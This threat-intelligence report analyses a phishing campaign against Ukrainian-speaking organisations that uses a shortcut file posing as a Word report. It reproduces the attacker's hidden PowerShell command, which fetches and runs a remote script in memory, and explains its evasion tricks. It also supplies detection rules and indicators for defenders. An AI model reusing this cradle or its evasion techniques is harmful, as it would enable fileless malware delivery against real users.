Dissecting a Ukraine-Targeted LNK Campaign: Cyrillic Homoglyphs, Fileless PowerShell, and Bulletproof Hosting
Published: 2026-03-08 | Author: Breakglass Intelligence | TLP:WHITE
TL;DR
A phishing campaign targeting Ukrainian-speaking organizations delivers a ZIP archive containing a .lnk file masquerading as a quarterly financial report (02.26_qurtal.docx). The shortcut launches a hidden PowerShell process that uses a WinHttp.WinHttpRequest.5.1 COM object to fetch and execute a Stage 2 script entirely in memory. The LNK display name contains Cyrillic homoglyph substitutions to defeat string-matching detections. Infrastructure is hosted on the ALTAWK/DGTLS-MNT bulletproof hosting cluster in Amsterdam -- the same network previously linked to NetSupport RAT deployments, AmateraStealer, and BrowserWare ClickFix campaigns.
Attack Chain Overview
ZIP archive
ββ 02.26_qurtal.docx.lnk (double extension; victim sees "02.26_qurtal.docx")
ββ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ββ -w Hidden (window hidden at PS level)
ββ SW_SHOWMINNOACTIVE (window minimized at LNK level)
ββ WinHttp COM download cradle β http://195.10.205[.]65/datemed/slappicnic.ps1
ββ [ScriptBlock]::Create() + dot-source β fileless Stage 2 execution
The kill chain is straightforward but layered with evasion at every step: double file extension masquerading, dual window-hiding, COM-based HTTP instead of PowerShell cmdlets, a custom User-Agent gate for server-side victim validation, and in-memory execution via ScriptBlock::Create to avoid touching disk.
The Lure: Quarterly Report for February 26
The filename 02.26_qurtal.docx.lnk is designed for Ukrainian-speaking targets:
02.26-- a February 26 date reference, establishing time-relevancequrtal-- a phonetic rendering of the Ukrainian word "kvartal" (quarter/quarterly), suggesting a financial or administrative report.docx.lnk-- Windows hides the.lnkextension by default, so the victim sees02.26_qurtal.docx- IconLocation:
imageres.dllindex 97 (generic document icon)
Combined with the LNK display name "MS Word Document," the file is indistinguishable from a legitimate Word document in Windows Explorer.
Cyrillic Homoglyph Evasion in the Display Name
The LNK NAME_STRING field reads "MS Word Document" -- but two characters are Cyrillic substitutions that are visually identical to their Latin counterparts:
| Position | Displayed Character | Actual Codepoint | Expected Codepoint |
|---|---|---|---|
| 4 (in "Word") | ΠΎ | U+043E (Cyrillic Small Letter O) | U+006F (Latin o) |
| 13 (in "Document") | Π΅ | U+0435 (Cyrillic Small Letter IE) | U+0065 (Latin e) |
This defeats any detection rule matching the Latin string "MS Word Document" -- the visual output is identical, but the byte sequences differ. This technique is more commonly associated with state-level or advanced criminal actors. It maps to MITRE ATT&CK T1027.013 (Obfuscated Files or Information: Encrypted/Encoded File).
The Download Cradle
The PowerShell command embedded in the LNK arguments:
-w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1';
$r.Open('GET', 'http://195.10.205[.]65/datemed/slappicnic.ps1', $false);
$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell');
$r.Send();
. ([ScriptBlock]::Create($r.ResponseText))
Several deliberate choices here:
WinHttp.WinHttpRequest.5.1 COM object -- Most PowerShell download cradles use Invoke-WebRequest, Invoke-RestMethod, or System.Net.WebClient. The WinHttp COM object operates at a lower level and bypasses some AMSI/EDR hooks that instrument the standard PowerShell cmdlets. This technique is more commonly seen in commodity malware frameworks than in known Ukrainian-targeting APT tooling.
Custom User-Agent UA WindowsPowerShell -- This is a server-side gate. The legitimate PowerShell User-Agent string is Mozilla/5.0 (Windows NT; Windows NT X.X; en-US) WindowsPowerShell/5.1. The shortened UA WindowsPowerShell is a deliberate custom value that the C2 server can check to filter out sandbox/researcher traffic. Only requests with the matching UA receive the payload.
[ScriptBlock]::Create() + dot-sourcing -- An IEX (Invoke-Expression) alternative. Functionally equivalent but less commonly flagged by detection rules. The dot-source operator (.) executes the created script block in the current scope, leaving no disk artifacts.
$false synchronous flag -- The Open() call uses synchronous mode, blocking until the response is received before executing. No race conditions, no timing issues.
Dual Window Hiding
The operator applies window concealment at two independent layers:
- LNK level:
ShowCommand = 7(SW_SHOWMINNOACTIVE) -- the spawned process window starts minimized without taking focus - PowerShell level:
-w Hidden(-WindowStyle Hidden) -- the PowerShell window is hidden entirely
If either layer fails or is stripped, the other still conceals the execution. This maps to T1564.003 (Hide Artifacts: Hidden Window).
Zero-Padding for Size Masquerading
The LNK file is 6,110 bytes, but 82.7% (5,053 bytes) is zero padding appended after the terminal data block. The actual payload and LNK structure occupy only 1,056 bytes. This inflates the file to a size that appears more plausible as a document. A 1KB "Word file" would raise suspicion; a 6KB one less so.
No hidden data exists in the padded region -- it is purely for size inflation.
C2 Infrastructure: ALTAWK Bulletproof Hosting
The Stage 2 payload URL resolves to 195.10.205[.]65, part of the ALTAWK-AMS2 /25 allocation:
| Field | Value |
|---|---|
| IP | 195.10.205[.]65 |
| Range | 195.10.205.0/25 |
| Netname | ALTAWK-AMS2 |
| Country | NL (Netherlands, Amsterdam) |
| Org | Partner Hosting LTD |
| Address | 71-75 Shelton Street, Covent Garden, London WC2H 9JQ |
| Abuse | abuse@altawk[.]com |
| Maintainers | altawk-com-mnt, Lir-zk-mnt, MNT-DGTL, DGTLS-MNT |
| Allocation Date | 2024-02-08 |
| Reverse DNS | None (SERVFAIL) |
| Server | Apache/2.4.58 (Ubuntu 24.04) |
| SSH | OpenSSH_9.6p1 Ubuntu-3ubuntu13.13 |
| Open Ports | 22 (SSH), 80 (HTTP) only |
The registered address at 71-75 Shelton Street is a well-known mail drop in London used by thousands of shell companies. Partner Hosting LTD is a documented bulletproof hosting provider identified by Sophos and CISA/NSA/FBI as part of an ecosystem that provisions VMs through ISPsystem's VMmanager platform for malicious use.
Cross-Campaign Infrastructure Overlap
The ALTAWK/DGTLS-MNT network hosts confirmed malicious operations beyond this campaign:
| Campaign | IP | Infrastructure |
|---|---|---|
| Ukraine LNK PS cradle | 195.10.205[.]65 | ALTAWK-AMS2 /25 |
| NetSupport RAT open directory | 193.111.117[.]17 | DGTLS-MNT (AS200823) |
| AmateraStealer C2 | 77.91.96[.]205 | ALTAWK |
| BrowserWare ClickFix | 77.91.65[.]56 | DGTLS-MNT / Partner Hosting |
A FASTPANEL default page on 195.10.205[.]67 (same /25) confirms ISPsystem infrastructure provisioning, consistent with the Sophos and CISA research on bulletproof hosting providers using ISPsystem/VMmanager templates.
Multi-Wave Campaign: Additional Payloads Discovered
OTX URL enumeration for 195.10.205[.]65 revealed a second campaign directory /kkraag/ with two additional PowerShell payloads predating the /datemed/ wave by approximately two days:
| URL | First Seen | Status |
|---|---|---|
http://195.10.205[.]65/datemed/slappicnic.ps1 | 2026-03-06 | 403 |
http://195.10.205[.]65/kkraag/golfproceedings.ps1 | 2026-02-24 | 403 |
http://195.10.205[.]65/kkraag/tactilelivestock.ps1 | 2026-02-24 | 403 |
All payload filenames follow an auto-generated compound-word pattern (two unrelated English words concatenated without separators): slappicnic, golfproceedings, tactilelivestock. This is consistent with automated word-pair generation used by commodity malware frameworks for URL randomization. The rotating directory names (datemed, kkraag) suggest per-wave infrastructure separation.
All endpoints now return HTTP 403 universally -- the server has been locked down or decommissioned. Comprehensive path probing (24 common paths, all HTTP methods, geo-fence bypass attempts via X-Forwarded-For) returned 403 across the board, indicating a blanket Require all denied directive.
Network Neighborhood Analysis
A scan of all 127 IPs in the ALTAWK-AMS2 /25 found 18 IPs responding on port 80 with mixed server software (Apache, nginx, IIS), confirming multi-tenant VM hosting. Notable findings:
- 195.10.205[.]70 -- Returns identical 403 response pattern but runs Apache/2.4.52 on Ubuntu 22.04 (vs. 2.4.58/24.04 on .65). Different VM, similar configuration. Potential second campaign server.
- 195.10.205[.]54 -- Runs Microsoft IIS/10.0 (Windows Server), consistent with ISPsystem VMmanager provisioning Windows VMs.
- 195.10.205[.]67 -- Serves FASTPANEL default page, confirming ISPsystem infrastructure.
- 195.10.205[.]43 -- Redirects to
internetwarriors[.]com, a minimal "cybersecurity and digital defense" landing page parked on bulletproof infrastructure.
Attribution Assessment
Verdict: UNATTRIBUTED -- mid-tier cybercriminal operation with Ukrainian targeting, likely operating within a PPI (pay-per-install) network.
We compared the TTPs against active Ukrainian-targeting groups tracked by CERT-UA:
| Group | Delivery Chain | Match Level |
|---|---|---|
| UAC-0010 (Gamaredon) | LNK β PS β DLL (Remcos RAT) | Strong delivery overlap, different PS techniques and infrastructure |
| UAC-0241 | LNK β HTA β PS β Go (GAMYBEAR) | Strong delivery overlap, uses mshta.exe chain |
| APT28 | ZIP β HTA β VBS β loader (BadPaw) | Partial, different execution chain |
| UAC-0219 | VBS β PS stealer (WRECKSTEEL) | Partial, no LNK component |
| UAC-0252 | EXE in archive (SalatStealer) | Weak, different delivery entirely |
None of these groups are documented using WinHttp.WinHttpRequest.5.1 for download, the UA WindowsPowerShell User-Agent gate, ScriptBlock::Create for execution, or ALTAWK/Partner Hosting infrastructure. The TTP combination does not match any known tracked actor.
Arguments for state-affiliated: Ukrainian-language quarterly report lure (targeted, not mass spam), Cyrillic homoglyph evasion (sophisticated), fileless execution chain, specific date reference suggesting event-timed campaign.
Arguments for commodity/criminal: WinHttp COM object common in commodity downloaders, auto-generated payload names, ALTAWK bulletproof hosting (multi-tenant, used by many actors), simple single-stage PS download (APTs typically use multi-stage chains).
Timeline
2024-02-08 ALTAWK-AMS2 /25 range created in RIPE
2025-02-03 altawk.com flagged as malicious on ANY.RUN
2025-05-23 195.10.205.70 first seen in OTX
2026-02-17 LNK weaponization timestamp (15:23:05 UTC)
2026-02-24 /kkraag/ payloads first observed on OTX
IP added to malware-filter botnet list
@smica83 tweets first opendir report
2026-02-26 /kkraag/ directory first probed (HTTP 403)
"02.26" date reference in LNK filename
2026-03-05 @smica83 tweets second opendir report
2026-03-06 Investigation begins β all payloads return 403
The payload availability window was extremely short -- possibly hours to days between deployment and lockdown. By the time the /kkraag/ payloads appeared in OTX on Feb 24, they were already returning 403.
MITRE ATT&CK Mapping
| Technique ID | Name | Usage |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | ZIP archive delivery |
| T1204.002 | User Execution: Malicious File | LNK disguised as DOCX |
| T1036.007 | Masquerading: Double File Extension | .docx.lnk hiding |
| T1036.005 | Masquerading: Match Legitimate Name | "MS Word Document" display name |
| T1027.013 | Obfuscated Files: Encrypted/Encoded File | Cyrillic homoglyph substitution |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Download cradle execution |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTP GET to C2 |
| T1105 | Ingress Tool Transfer | Stage 2 PS1 download |
| T1564.003 | Hide Artifacts: Hidden Window | Dual window hiding |
| T1218 | System Binary Proxy Execution | powershell.exe as LOLBin |
Detection
Suricata / Snort
alert http $HOME_NET any -> any any (
msg:"Ukraine LNK Campaign - WinHttp PS Download Cradle";
content:"GET"; http_method;
content:"UA WindowsPowerShell"; http_header;
pcre:"/\/[a-z]+\/[a-z]+\.(ps1|txt|hta)/Ui";
sid:2026030601; rev:1;
)
Sysmon
EventID 1 (Process Creation):
ParentImageends with\explorer.exeImageends with\powershell.exeCommandLinecontainsWinHttp.WinHttpRequest.5.1ANDScriptBlock::Create
EventID 3 (Network Connection):
Imageends with\powershell.exeDestinationIpin195.10.205.0/25DestinationPort=80
YARA
rule ukraine_lnk_winhttprequest_cradle {
meta:
description = "LNK with WinHttpRequest PowerShell download cradle"
author = "Breakglass Intelligence"
date = "2026-03-08"
reference = "https://intel.breakglass.tech"
tlp = "white"
strings:
$lnk_magic = { 4C 00 00 00 01 14 02 00 }
$winhttpreq = "WinHttp.WinHttpRequest" wide ascii
$scriptblock = "ScriptBlock" wide ascii
$ua_ps = "UA WindowsPowerShell" wide ascii
condition:
$lnk_magic at 0 and $winhttpreq and $scriptblock
}
Infrastructure Hunting
Pivot on SSH host key fingerprints via Shodan/Censys to find additional servers provisioned by the same operator:
- RSA:
SHA256:O+oP677Y1bxtTBxaVyvZzzTolt5igT8XrFgo/sNM7Nk - Ed25519:
SHA256:pUjBuPM3sGNhLKJD3cypdwSYQXlochcO1RdLO0zm3pk
Monitor the broader ALTAWK allocation:
195.10.205.0/25-- this range77.91.64.0/20-- broader ALTAWK allocation193.111.117.0/24-- DGTLS-MNT range
Indicators of Compromise
Files
| Indicator | Type | Value |
|---|---|---|
| LNK MD5 | 02.26_qurtal.docx.lnk | 4999efed7397536355c5d353283240c8 |
| LNK SHA-256 | 02.26_qurtal.docx.lnk | bee1f85acc47382c2ed67c7bb636dff411965e5bdb0e105f44469f3bf05fa812 |
| ZIP SHA-256 | Container archive | 062881cabcd9eb2a9163601cf207a9573bd07d56d64f2a508b917bd74b5a1f46 |
Network
| Indicator | Type | Context |
|---|---|---|
195.10.205[.]65 | IPv4 | C2 server (ALTAWK-AMS2, Partner Hosting LTD, NL) |
195.10.205[.]70 | IPv4 | Potential second campaign server (same /25) |
http://195.10.205[.]65/datemed/slappicnic.ps1 | URL | Stage 2 payload (current wave) |
http://195.10.205[.]65/kkraag/golfproceedings.ps1 | URL | Stage 2 payload (prior wave) |
http://195.10.205[.]65/kkraag/tactilelivestock.ps1 | URL | Stage 2 payload (prior wave) |
UA WindowsPowerShell | User-Agent | Server-side gate string |
Infrastructure Fingerprints
| Indicator | Type | Value |
|---|---|---|
| SSH RSA fingerprint | Host key | SHA256:O+oP677Y1bxtTBxaVyvZzzTolt5igT8XrFgo/sNM7Nk |
| SSH Ed25519 fingerprint | Host key | SHA256:pUjBuPM3sGNhLKJD3cypdwSYQXlochcO1RdLO0zm3pk |
| SSH banner | Service | SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.13 |
| HTTP Server | Service | Apache/2.4.58 (Ubuntu) |
Build Indicators
| Indicator | Value |
|---|---|
| Weaponization timestamp | 2026-02-17 15:23:05 UTC |
| LNK target path | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| ShowCommand | 7 (SW_SHOWMINNOACTIVE) |
| IconLocation | imageres.dll index 97 |
| Cyrillic homoglyphs | U+043E at position 4, U+0435 at position 13 |
Cross-Campaign Infrastructure (ALTAWK/DGTLS-MNT)
| IP | Campaign |
|---|---|
193.111.117[.]17 | NetSupport RAT open directory |
77.91.96[.]205 | AmateraStealer C2 |
77.91.65[.]56 | BrowserWare ClickFix |